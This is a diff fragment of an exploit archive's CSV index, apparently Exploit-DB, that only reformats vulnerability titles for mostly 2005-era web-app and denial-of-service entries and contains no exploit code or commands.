Kings: Battles 1.23 - Remote Format String Vulnerability",2005-05-23,"Luigi Auriemma",multiple,remote,0 +25692,platforms/multiple/remote/25692.txt,"Warrior Kings: Battles 1.23 - Remote Denial of Service Vulnerability",2005-05-23,"Luigi Auriemma",multiple,remote,0 +25693,platforms/php/webapps/25693.txt,"GForge 3.x - Remote Arbitrary Command Execution Vulnerability",2005-05-24,"Filippo Spike Morelli",php,webapps,0 25694,platforms/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 results.stm indexname XSS",2005-05-24,"Jamie Fisher",windows,remote,0 25695,platforms/windows/remote/25695.txt,"Sambar Server 5.x/6.0/6.1 logout RCredirect XSS",2005-05-24,"Jamie Fisher",windows,remote,0 25696,platforms/windows/remote/25696.txt,"Sambar Server 5.x/6.0/6.1 Server Referer XSS",2005-05-24,"Jamie Fisher",windows,remote,0 @@ -22793,7 +22793,7 @@ id,file,description,date,author,platform,type,port 25699,platforms/windows/dos/25699.txt,"Gearbox Software Halo Game Server 1.06/1.07 Infinite Loop Denial of Service Vulnerability",2005-05-24,"Luigi Auriemma",windows,dos,0 25700,platforms/asp/webapps/25700.txt,"Spread The Word Multiple Cross-Site Scripting Vulnerabilities",2005-05-24,Lostmon,asp,webapps,0 25701,platforms/asp/webapps/25701.txt,"Spread The Word Multiple SQL Injection Vulnerabilities",2005-05-24,Lostmon,asp,webapps,0 -25702,platforms/java/webapps/25702.txt,"Sun JavaMail 1.x Multiple Information Disclosure Vulnerabilities",2005-05-24,"Ricky Latt",java,webapps,0 +25702,platforms/java/webapps/25702.txt,"Sun JavaMail 1.x - Multiple Information Disclosure Vulnerabilities",2005-05-24,"Ricky Latt",java,webapps,0 25703,platforms/solaris/local/25703.txt,"Active News Manager LOGIN.ASP SQL Injection Vulnerability",2005-05-25,Romty,solaris,local,0 25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 Poll_Vote.PHP Remote File Include Vulnerability",2005-05-25,"rash ilusion",php,webapps,0 25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 Login.ASP SQL Injection Vulnerability",2005-05-25,Romty,asp,webapps,0 @@ -22844,9 +22844,9 @@ id,file,description,date,author,platform,type,port 25752,platforms/php/dos/25752.txt,"PHPMailer 1.7 Data() Function Remote Denial of Service Vulnerability",2005-05-28,"Mariano Nunez Di Croce",php,dos,0 25753,platforms/asp/webapps/25753.txt,"Hosting Controller 6.1 resellerresources.asp jresourceid Parameter SQL Injection",2005-05-28,"GrayHatz Security Group",asp,webapps,0 25754,platforms/asp/webapps/25754.txt,"Hosting Controller 6.1 plandetails.asp Information Disclosure",2005-05-28,"GrayHatz Security Group",asp,webapps,0 -25755,platforms/windows/remote/25755.txt,"serverscheck 5.9/5.10 - Directory Traversal vulnerability",2005-05-30,rgod,windows,remote,0 +25755,platforms/windows/remote/25755.txt,"serverscheck 5.9/5.10 - Directory Traversal Vulnerability",2005-05-30,rgod,windows,remote,0 25756,platforms/php/webapps/25756.txt,"India Software Solution Shopping Cart SQL Injection Vulnerability",2005-05-28,Rayden,php,webapps,0 -25757,platforms/multiple/dos/25757.txt,"Firefly Studios Stronghold 2 Remote Denial of Service Vulnerability",2005-05-28,"Luigi Auriemma",multiple,dos,0 +25757,platforms/multiple/dos/25757.txt,"Firefly Studios Stronghold 2 - Remote Denial of Service Vulnerability",2005-05-28,"Luigi Auriemma",multiple,dos,0 25758,platforms/asp/webapps/25758.txt,"Hosting Controller 6.1 User Profile Unauthorized Access Vulnerability",2005-05-30,"GrayHatz Security Group",asp,webapps,0 25759,platforms/php/webapps/25759.txt,"Qualiteam X-Cart 4.0.8 home.php Multiple Parameter XSS",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25760,platforms/php/webapps/25760.txt,"Qualiteam X-Cart 4.0.8 product.php Multiple Parameter XSS",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 @@ -22866,7 +22866,7 @@ id,file,description,date,author,platform,type,port 25774,platforms/php/webapps/25774.txt,"Qualiteam X-Cart 4.0.8 giftcert.php Multiple Parameter SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,metasploit,linux,remote,80 25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 IncDir Remote File Include Vulnerability",2005-05-31,"SoulBlack Group",php,webapps,0 -25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0 +25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0 25779,platforms/php/webapps/25779.txt,"MyBB Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2005-05-31,"Alberto Trivero",php,webapps,0 25780,platforms/asp/webapps/25780.txt,"JiRo's Upload System 1.0 Login.ASP SQL Injection Vulnerability",2005-06-01,Romty,asp,webapps,0 25781,platforms/asp/webapps/25781.txt,"NEXTWEB (i)Site Login.ASP SQL Injection Vulnerability",2005-06-01,"Jim Pangalos",asp,webapps,0 @@ -22879,7 +22879,7 @@ id,file,description,date,author,platform,type,port 25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - ChildWindow.Inc.PHP Remote File Include Vulnerability",2005-06-03,"Leon Juranic",php,webapps,0 25789,platforms/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure Vulnerability",2005-06-06,"Miklos Szeredi",linux,local,0 25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 LOGIN.ASP SQL Injection Vulnerability",2005-06-06,Romty,asp,webapps,0 -25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 Remote Denial of Service Vulnerability",2005-06-06,"Luigi Auriemma",multiple,dos,0 +25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 - Remote Denial of Service Vulnerability",2005-06-06,"Luigi Auriemma",multiple,dos,0 25792,platforms/php/webapps/25792.txt,"YaPiG 0.9x Remote and Local File Include Vulnerabilities",2005-06-06,anonymous,php,webapps,0 25793,platforms/php/webapps/25793.txt,"YaPiG 0.9x View.PHP Cross-Site Scripting Vulnerability",2005-06-06,anonymous,php,webapps,0 25794,platforms/php/webapps/25794.txt,"YaPiG 0.9x Upload.PHP Directory Traversal Vulnerability",2005-06-06,anonymous,php,webapps,0 @@ -22907,7 +22907,7 @@ id,file,description,date,author,platform,type,port 25816,platforms/php/webapps/25816.txt,"Ovidentia FX Remote File Include Vulnerability",2005-06-10,Status-x,php,webapps,0 25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 Jammail.pl Remote Arbitrary Command Execution Vulnerability",2005-06-12,blahplok,cgi,webapps,0 25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 beta Image Gallery Index.PHP Cross-Site Scripting Vulnerability",2005-06-13,TheGreatOne2176,php,webapps,0 -25819,platforms/php/webapps/25819.txt,"FusionBB 0.x Multiple Input Validation Vulnerabilities",2005-06-13,"James Bercegay",php,webapps,0 +25819,platforms/php/webapps/25819.txt,"FusionBB 0.x - Multiple Input Validation Vulnerabilities",2005-06-13,"James Bercegay",php,webapps,0 25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 ASCII File Extension File Filter Circumvention Vulnerability",2005-06-14,d.schroeter@gmx.de,linux,remote,0 25821,platforms/php/webapps/25821.txt,"Annuaire 1Two 1.0/1.1 Index.PHP Cross-Site Scripting Vulnerability",2005-06-14,An0nym0uS,php,webapps,0 25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0, Adobe Reader 7.0 File Existence and Disclosure Vulnerability",2005-06-15,"Sverre H. Huseby",windows,remote,0 @@ -22995,11 +22995,11 @@ id,file,description,date,author,platform,type,port 25905,platforms/asp/webapps/25905.txt,"ASPNuke 0.80 forgot_password.asp email Parameter XSS",2005-06-27,"Alberto Trivero",asp,webapps,0 25906,platforms/asp/webapps/25906.txt,"ASPNuke 0.80 register.asp Multiple Parameter XSS",2005-06-27,"Alberto Trivero",asp,webapps,0 25907,platforms/asp/webapps/25907.txt,"ASPNuke 0.80 Language_Select.ASP HTTP Response Splitting Vulnerability",2005-06-27,"Alberto Trivero",asp,webapps,0 -25908,platforms/asp/webapps/25908.txt,"ASPPlayground.NET 3.2 SR1 Remote Arbitrary File Upload Vulnerability",2005-06-27,Psycho,asp,webapps,0 +25908,platforms/asp/webapps/25908.txt,"ASPPlayground.NET 3.2 SR1 - Remote Arbitrary File Upload Vulnerability",2005-06-27,Psycho,asp,webapps,0 25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0 25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0 25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0 -25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring 0 Exploit",2013-06-03,"Tavis Ormandy",windows,local,0 +25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring - Exploit",2013-06-03,"Tavis Ormandy",windows,local,0 25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0 25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0 @@ -23009,7 +23009,7 @@ id,file,description,date,author,platform,type,port 25921,platforms/windows/dos/25921.txt,"Raven Software Soldier Of Fortune 2 Ignore Command Remote Denial of Service Vulnerability",2005-06-29,"Luigi Auriemma",windows,dos,0 25922,platforms/asp/webapps/25922.txt,"CyberStrong EShop 4.2 20review.ASP SQL Injection Vulnerability",2005-06-30,aresu@bosen.net,asp,webapps,0 25923,platforms/asp/webapps/25923.txt,"CyberStrong eShop 4.2 10expand.ASP SQL Injection Vulnerability",2005-06-30,aresu@bosen.net,asp,webapps,0 -25924,platforms/asp/webapps/25924.txt,"fsboard 2.0 - Directory Traversal vulnerability",2005-06-30,ActualMInd,asp,webapps,0 +25924,platforms/asp/webapps/25924.txt,"fsboard 2.0 - Directory Traversal Vulnerability",2005-06-30,ActualMInd,asp,webapps,0 25925,platforms/asp/webapps/25925.txt,"CyberStrong EShop 4.2 10browse.ASP SQL Injection Vulnerability",2005-06-30,aresu@bosen.net,asp,webapps,0 25926,platforms/php/webapps/25926.txt,"OSTicket 1.2/1.3 view.php inc Variable Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 25927,platforms/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x Graph_Image.PHP Remote Command Execution Variant Vulnerability",2005-07-01,"Alberto Trivero",php,webapps,0 @@ -23018,7 +23018,7 @@ id,file,description,date,author,platform,type,port 25930,platforms/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x header.inc.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25931,platforms/php/webapps/25931.txt,"EasyPHPCalendar 6.1.5/6.2.x datePicker.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25932,platforms/php/webapps/25932.txt,"EasyPHPCalendar 6.1.5/6.2.x setupSQL.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 -25933,platforms/windows/remote/25933.txt,"slimserve httpd 1.0/1.1 - Directory Traversal vulnerability",2001-03-04,se00020,windows,remote,0 +25933,platforms/windows/remote/25933.txt,"slimserve httpd 1.0/1.1 - Directory Traversal Vulnerability",2001-03-04,se00020,windows,remote,0 25934,platforms/php/webapps/25934.txt,"Plague News System 0.7 CID Parameter SQL Injection Vulnerability",2005-07-04,Easyex,php,webapps,0 25935,platforms/php/webapps/25935.txt,"Plague News System 0.7 CID Parameter Cross-Site Scripting Vulnerability",2005-07-04,Easyex,php,webapps,0 25936,platforms/windows/dos/25936.pl,"PlanetDNS PlanetFileServer Remote Buffer Overflow Vulnerability",2005-06-28,fRoGGz,windows,dos,0 @@ -23026,8 +23026,8 @@ id,file,description,date,author,platform,type,port 25938,platforms/php/webapps/25938.txt,"phpPgAdmin 3.x Login Form Directory Traversal Vulnerability",2005-07-05,rznvynqqe@hushmail.com,php,webapps,0 25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 Read.CGI Remote Command Execution Vulnerability",2005-07-05,AcidCrash,cgi,webapps,0 25940,platforms/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 Index.PHP Cross-Site Scripting Vulnerability",2005-07-05,mozako,php,webapps,0 -25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 Form.Inc.PHP3 Remote File Include Vulnerability",2005-07-05,"SoulBlack Group",php,webapps,0 -25942,platforms/php/webapps/25942.txt,"JAWS 0.x Remote File Include Vulnerability",2005-07-06,"Stefan Esser",php,webapps,0 +25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 Form.Inc.PHP3 - Remote File Include Vulnerability",2005-07-05,"SoulBlack Group",php,webapps,0 +25942,platforms/php/webapps/25942.txt,"JAWS 0.x - Remote File Include Vulnerability",2005-07-06,"Stefan Esser",php,webapps,0 25943,platforms/linux/dos/25943.txt,"OFTPD 0.3.x User Command Buffer Overflow Vulnerability",2005-07-06,new.security@gmail.com,linux,dos,0 25944,platforms/multiple/remote/25944.txt,"IBM Lotus Domino Notes 6.0/6.5 Mail Template Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,multiple,remote,0 25945,platforms/php/webapps/25945.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Index.PHP Directory Traversal Vulnerability",2005-07-06,"Diabolic Crab",php,webapps,0 @@ -23036,12 +23036,12 @@ id,file,description,date,author,platform,type,port 25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x Automatic Script Execution Vulnerability",2005-07-06,shalom@venera.com,windows,remote,0 25949,platforms/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x Spoofed SIP Status Message Handling Weakness",2005-07-06,DrFrancky,hardware,remote,0 25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 Plug-In Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0 -25951,platforms/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",php,webapps,0 +25951,platforms/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",php,webapps,0 25952,platforms/cgi/webapps/25952.txt,"Pngren 2.0.1 Kaiseki.CGI Remote Command Execution Vulnerability",2005-07-07,blahplok,cgi,webapps,0 -25953,platforms/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 +25953,platforms/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 25954,platforms/php/webapps/25954.txt,"phpauction 2.5 - Multiple Vulnerabilities",2005-07-07,Dcrab,php,webapps,0 25955,platforms/php/webapps/25955.txt,"PhotoGal 1.0/1.5 News_File Remote File Include Vulnerability",2005-07-07,"skdaemon porra",php,webapps,0 -25956,platforms/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 +25956,platforms/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0 25957,platforms/php/webapps/25957.txt,"PunBB 1.x Profile.PHP User Profile Edit Module SQL Injection Vulnerability",2005-07-08,"Stefan Esser",php,webapps,0 25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 SQL.CLS.PHP SQL Injection Vulnerability",2005-07-10,Defa,php,webapps,0 25959,platforms/php/webapps/25959.txt,"Spid 1.3 lang_path File Include Vulnerability",2005-07-11,"skdaemon porra",php,webapps,0 @@ -23065,7 +23065,7 @@ id,file,description,date,author,platform,type,port 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 25978,platforms/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 25979,platforms/windows/remote/25979.rb,"Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",2013-06-05,metasploit,windows,remote,0 -25980,platforms/multiple/remote/25980.rb,"Apache Struts includeParams Remote Code Execution",2013-06-05,metasploit,multiple,remote,8080 +25980,platforms/multiple/remote/25980.rb,"Apache Struts - includeParams Remote Code Execution",2013-06-05,metasploit,multiple,remote,8080 25981,platforms/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injection Vulnerabilities",2005-07-13,"Soroush Dalili",asp,webapps,0 25982,platforms/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 Forum.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0 25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 User.CFM Cross-Site Scripting Vulnerability",2005-07-14,rUnViRuS,cfm,webapps,0 @@ -23106,7 +23106,7 @@ id,file,description,date,author,platform,type,port 26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 26022,platforms/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ Unauthorized Access Vulnerability",2005-07-25,d.is.evil,hardware,remote,0 26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 Apa_PHPInclude.INC.PHP Remote File Include Vulnerability",2005-07-25,lwdz,php,webapps,0 -26024,platforms/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal vulnerability",2005-07-25,"Martin O'Neal",linux,remote,0 +26024,platforms/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal Vulnerability",2005-07-25,"Martin O'Neal",linux,remote,0 26025,platforms/php/webapps/26025.txt,"Netquery 3.1 submit.php portnum Parameter XSS",2005-07-25,rgod,php,webapps,0 26026,platforms/php/webapps/26026.txt,"Netquery 3.1 nqgeoip2.php Multiple Parameter XSS",2005-07-25,rgod,php,webapps,0 26027,platforms/php/webapps/26027.txt,"Netquery 3.1 nqgeoip.php step Parameter XSS",2005-07-25,rgod,php,webapps,0 @@ -23128,9 +23128,9 @@ id,file,description,date,author,platform,type,port 26043,platforms/php/webapps/26043.txt,"Clever Copy 2.0 Private Message Unauthorized Access Vulnerability",2005-07-27,Lostmon,php,webapps,0 26044,platforms/windows/remote/26044.txt,"MDaemon 8.0 Content Filter Directory Traversal Vulnerability",2005-07-27,"Tan Chew Keong",windows,remote,0 26045,platforms/php/webapps/26045.txt,"PHPList 2.8.12 Admin Page SQL Injection Vulnerability",2005-07-28,tgo,php,webapps,0 -26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 Multiple Cross Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0 -26047,platforms/php/webapps/26047.txt,"Easypx41 Multiple Cross Site Scripting Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 -26048,platforms/php/webapps/26048.txt,"Easypx41 Multiple Variable Injection Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 +26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0 +26047,platforms/php/webapps/26047.txt,"Easypx41 - Multiple Cross Site Scripting Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 +26048,platforms/php/webapps/26048.txt,"Easypx41 - Multiple Variable Injection Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 26049,platforms/php/webapps/26049.txt,"VBZoom 1.0/1.11 profile.php UserName Parameter XSS",2005-07-29,almaster,php,webapps,0 26050,platforms/php/webapps/26050.txt,"VBZoom 1.0/1.11 login.php UserID Parameter XSS",2005-07-29,almaster,php,webapps,0 26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 index.php username Parameter XSS",2005-07-30,"James Bercegay",php,webapps,0 @@ -23141,7 +23141,7 @@ id,file,description,date,author,platform,type,port 26056,platforms/php/webapps/26056.txt,"MySQL AB Eventum 1.x view.php id Parameter XSS",2005-08-01,"James Bercegay",php,webapps,0 26057,platforms/php/webapps/26057.txt,"MySQL AB Eventum 1.x list.php release Parameter XSS",2005-08-01,"James Bercegay",php,webapps,0 26058,platforms/php/webapps/26058.txt,"MySQL AB Eventum 1.x get_jsrs_data.php F Parameter XSS",2005-08-01,"James Bercegay",php,webapps,0 -26059,platforms/php/webapps/26059.txt,"PHPFreeNews 1.x Multiple Cross Site Scripting Vulnerabilities",2005-08-01,rgod,php,webapps,0 +26059,platforms/php/webapps/26059.txt,"PHPFreeNews 1.x - Multiple Cross Site Scripting Vulnerabilities",2005-08-01,rgod,php,webapps,0 26060,platforms/cfm/webapps/26060.txt,"AderSoftware CFBB 1.1 Index.CFM Cross-Site Scripting Vulnerability",2005-08-01,rUnViRuS,cfm,webapps,0 26061,platforms/php/webapps/26061.txt,"PHPFreeNews 1.x Admin Login SQL Injection Vulnerability",2005-08-01,rgod,php,webapps,0 26062,platforms/php/webapps/26062.txt,"OpenBook 1.2.2 Admin.PHP SQL Injection Vulnerability",2005-08-01,SVT,php,webapps,0 @@ -23180,10 +23180,10 @@ id,file,description,date,author,platform,type,port 26097,platforms/php/webapps/26097.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 jnl_records User Database Disclosure",2005-08-05,Lostmon,php,webapps,0 26098,platforms/php/webapps/26098.txt,"FlatNuke 2.5.5 structure.php Multiple Parameter XSS",2005-08-05,rgod,php,webapps,0 26099,platforms/php/webapps/26099.txt,"FlatNuke 2.5.5 footer.php Multiple Parameter XSS",2005-08-05,rgod,php,webapps,0 -26100,platforms/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 Multiple Local Vulnerabilities",2005-08-05,c0ntex,linux,local,0 -26101,platforms/linux/remote/26101.txt,"EMC Navisphere Manager 6.x Directory Traversal And Information Disclosure Vulnerabilities",2005-08-05,anonymous,linux,remote,0 +26100,platforms/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 - Multiple Local Vulnerabilities",2005-08-05,c0ntex,linux,local,0 +26101,platforms/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal And Information Disclosure Vulnerabilities",2005-08-05,anonymous,linux,remote,0 26102,platforms/php/webapps/26102.txt,"PHP-Fusion 4.0/5.0/6.0 Messages.PHP SQL Injection Vulnerability",2005-08-06,almaster,php,webapps,0 -26103,platforms/php/webapps/26103.txt,"SysCP 1.2.x Multiple Script Execution Vulnerabilities",2005-08-08,"Christopher Kunz",php,webapps,0 +26103,platforms/php/webapps/26103.txt,"SysCP 1.2.x - Multiple Script Execution Vulnerabilities",2005-08-08,"Christopher Kunz",php,webapps,0 26104,platforms/php/webapps/26104.html,"Invision Power Board 1.0.3 Attached File Cross-Site Scripting Vulnerability",2005-08-08,V[i]RuS,php,webapps,0 26105,platforms/php/webapps/26105.html,"E107 Website System 0.6 Attached File Cross-Site Scripting Vulnerability",2005-08-08,edward11,php,webapps,0 26106,platforms/php/webapps/26106.txt,"Gravity Board X 1.1 Login SQL Injection Vulnerability",2005-08-08,rgod,php,webapps,0 @@ -23204,7 +23204,7 @@ id,file,description,date,author,platform,type,port 26121,platforms/php/webapps/26121.txt,"FunkBoard 0.66 profile.php Multiple Parameter XSS",2005-08-08,rgod,php,webapps,0 26122,platforms/php/webapps/26122.txt,"FunkBoard 0.66 register.php Multiple Parameter XSS",2005-08-08,rgod,php,webapps,0 26123,platforms/multiple/remote/26123.rb,"Java Web Start Double Quote Injection Remote Code Execution",2013-06-11,Rh0,multiple,remote,0 -26124,platforms/php/webapps/26124.txt,"Wordpress WP-SendSMS Plugin 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0 +26124,platforms/php/webapps/26124.txt,"Wordpress WP-SendSms Plugin 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0 26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c (editor.php, mapname param) - Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 26126,platforms/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",php,webapps,0 26127,platforms/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injection Vulnerabilities",2005-08-09,admin@batznet.com,php,webapps,0 @@ -23299,14 +23299,14 @@ id,file,description,date,author,platform,type,port 26216,platforms/windows/dos/26216.txt,"Indiatimes Messenger 6.0 - Remote Buffer Overflow Vulnerability",2005-08-31,ViPeR,windows,dos,0 26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability",2005-08-31,groszynskif,php,webapps,0 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 Arbitrary Configuration File Access Vulnerability",2005-09-01,rotor,linux,local,0 -26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 Remote Denial of Service Vulnerability",2005-09-02,"Critical Security",windows,dos,0 +26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service Vulnerability",2005-09-02,"Critical Security",windows,dos,0 26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0 26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger ActiveX Control Information Disclosure Vulnerability",2005-09-05,"Gregory R. Panakkal",windows,remote,0 26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness",2005-08-06,"Andres Tarasco",windows,local,0 26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 Events.PHP HTML Injection Vulnerability",2005-09-06,conor.e.buckley,php,webapps,0 26224,platforms/php/webapps/26224.txt,"Unclassified NewsBoard 1.5.3 Description Field HTML Injection Vulnerability",2005-09-06,retrogod@aliceposta.it,php,webapps,0 26225,platforms/php/webapps/26225.txt,"MAXdev MD-Pro 1.0.73 Arbitrary Remote File Upload Vulnerability",2005-09-06,rgod,php,webapps,0 -26226,platforms/php/webapps/26226.txt,"MAXdev MD-Pro 1.0.73 Multiple Cross-Site Scripting Vulnerabilities",2005-09-06,rgod,php,webapps,0 +26226,platforms/php/webapps/26226.txt,"MAXdev MD-Pro 1.0.73 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-06,rgod,php,webapps,0 26227,platforms/php/webapps/26227.txt,"MyBulletinBoard 1.0 Forumdisplay.PHP Cross-Site Scripting Vulnerability",2005-09-06,Dominic.Parikh,php,webapps,0 26228,platforms/php/webapps/26228.txt,"MyBulletinBoard 1.0 - Multiple SQL Injection Vulnerabilities",2005-09-06,stranger-killer,php,webapps,0 26229,platforms/php/webapps/26229.txt,"PHPCommunityCalendar 4.0 - Multiple SQL Injection Vulnerabilities",2005-09-07,rgod,php,webapps,0 @@ -23328,7 +23328,7 @@ id,file,description,date,author,platform,type,port 26247,platforms/php/webapps/26247.txt,"MyBulletinBoard 1.0 RateThread.PHP SQL Injection Vulnerability",2005-09-09,stranger-killer,php,webapps,0 26248,platforms/linux/local/26248.sh,"Linux Kernel 2.6.x SCSI ProcFS Denial of Service Vulnerability",2005-09-09,anonymous,linux,local,0 26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service Vulnerability",2005-09-09,Shiraishi.M,linux,dos,0 -26250,platforms/multiple/dos/26250.pl,"COOL! Remote Control 1.12 Remote Denial of Service Vulnerability",2005-09-12,"Infam0us Gr0up",multiple,dos,0 +26250,platforms/multiple/dos/26250.pl,"COOL! Remote Control 1.12 - Remote Denial of Service Vulnerability",2005-09-12,"Infam0us Gr0up",multiple,dos,0 26251,platforms/linux/dos/26251.c,"Snort 2.x PrintTcpOptions Remote Denial of Service Vulnerability",2005-09-12,"VulnFact Security Labs",linux,dos,0 26252,platforms/php/webapps/26252.txt,"Subscribe Me Pro 2.44 S.PL Remote Directory Traversal Vulnerability",2005-09-13,h4cky0u,php,webapps,0 26253,platforms/php/webapps/26253.txt,"Land Down Under 800/801 auth.php m Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 @@ -23363,8 +23363,8 @@ id,file,description,date,author,platform,type,port 26283,platforms/php/webapps/26283.txt,"VBulletin 1.0.1 lite/2.x/3.0 /admincp/template.php Multiple Parameter XSS",2005-09-19,deluxe@security-project.org,php,webapps,0 